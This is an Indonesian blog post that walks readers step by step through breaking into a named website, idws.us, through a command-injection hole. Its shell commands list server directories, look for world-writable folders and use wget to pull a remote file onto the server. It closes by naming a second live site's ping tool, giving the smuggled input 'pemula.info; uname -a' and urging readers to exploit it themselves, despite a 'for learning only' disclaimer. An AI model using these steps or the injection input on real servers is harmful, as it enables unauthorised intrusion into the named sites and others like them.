FREE FAST ONLINE TV

Idws Step By Step Via HandPhone

Posted by Jhony Tato 4 komentar
.: Media - Cybers :. - Step by step bobol idws.us.
mohon maaf sekali kepada admin idws.us, karena web anda telah saya jadikan sebagai percobaan.
buat pengunjung blog ini, saya tegaskan jangan melakukan pengrusakan di idws.us,karena hal itu anda menjadi tersangka kriminal. apa bila hal itu tetap anda lakukan, itu merupakan diluar tanggung jawab saya, semua artikel disini hanya semata-mata untuk pelajaran, bukan untuk merusak atou pun memojokkan pihak tertentu.
Anda boleh melaporkan bug atou celah keamanan ini kepada admin idws, & saya berharap secepatnya di perbaiki.
Sekali lagi saya mohon maaf.

oke.. saya lanjutkan..
1. gunakan command: ls -la (untuk melihat file yang ada dalam directory)
 idws-1.pngidws-2.png
2. gunakan command: pwd (untuk mengetahui lokasi kita berada, untuk mengetahui directory server berikutnya)
idws-3.pngidws-4.png

3. gunakan command: ls -la /var/vhost (untuk melihat file atou folder yang ada di derectory /var/vhost, yang merupakan directory nama domain berada)

idws-5.pngidws-6.png

4. gunakan command: ls -la /var/vhost/idws.us (untuk melihat file atou directory idws.us. & cari  directory yang permission 0777)

idws-7.pngidws-8.png

5.gunakan command: ls -la /var/vhost/idws.us/list_member (directory list_member yang saya pilih, karena permission 0777, & memungkin kan untuk upload)

idws-9.pngidws-10.png

6. gunakan command: wget untuk mengupload (untuk mengupload file menggunakan remote file)

idws-11.pngidws-12.png

7. hasilnya setelah terupload (finish)

idws-13.png

tadi pagi saya iseng2 saya mencoba  pencarian di google dengan keyword whois pemula.info, dan saya menemukan satu website yang sama persis celah keamanan nya seperti yang di atas

http://www.webstatsdomain.com/tools/ping.php
command yang saya gunakan untuk test: pemula.info; uname -a

silahkan anda exploitasi sendiri.
terimakasih